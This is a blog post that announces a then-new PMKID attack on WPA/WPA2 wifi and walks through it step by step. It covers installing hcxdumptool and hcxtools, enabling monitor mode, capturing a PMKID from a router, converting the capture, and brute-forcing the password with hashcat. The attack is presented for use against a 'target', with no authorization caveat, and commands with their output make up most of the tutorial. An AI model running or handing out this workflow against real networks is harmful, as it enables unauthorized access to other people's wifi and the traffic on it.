WPA2 is broken again! A security researcher has found new method to crack WPA standard and obtain the password.

Its discovered by Jens Atom – a lead developer of hashcat.  This was pure accidental, he was actually analyzing the newly-launched WPA3 protocol.

Usually a wifi network is hacked by exploiting WPS feature or capturing EAPOL 4 way handshake from a client. The attacker have to wait for the client to login. In this new method an attacker doesn’t need a client or a handshake.

Here a hacker obtains the Pairwise Master Key Identifier (PMKID) from a WPA/WPA2-secured router and crack the PSK. The PMKID is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address.

askthehackers

 

How to capture PMKID

In order to make use of this new attack you need the following tools:

Download and intsall the tools

hcxdumptool

git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install

hcxtools

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install

Step-1 : Put your wifi interface to monitor mode

airmon-ng start wlan0

Step-2 : start packet capture

hcxdumptool -o test.pcapng -i wlan0mon --enable_status=3

Output:

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

If an AP recieves our association request packet and supports sending PMKID we will see a message “FOUND PMKID” after a moment:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Step-3 : convert to hash format

hcxpcaptool -z test.16800 test.pcapng

output:

start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

Step-4 : Crack the hash using hashcat

Now we have our hash in test.16800 file. Feed it to hashcat to get the password.

Bruteforce mode:

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?l?l?l?l'

You can also use Dictionary and various attack modes depending on the difficulty of target.


Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.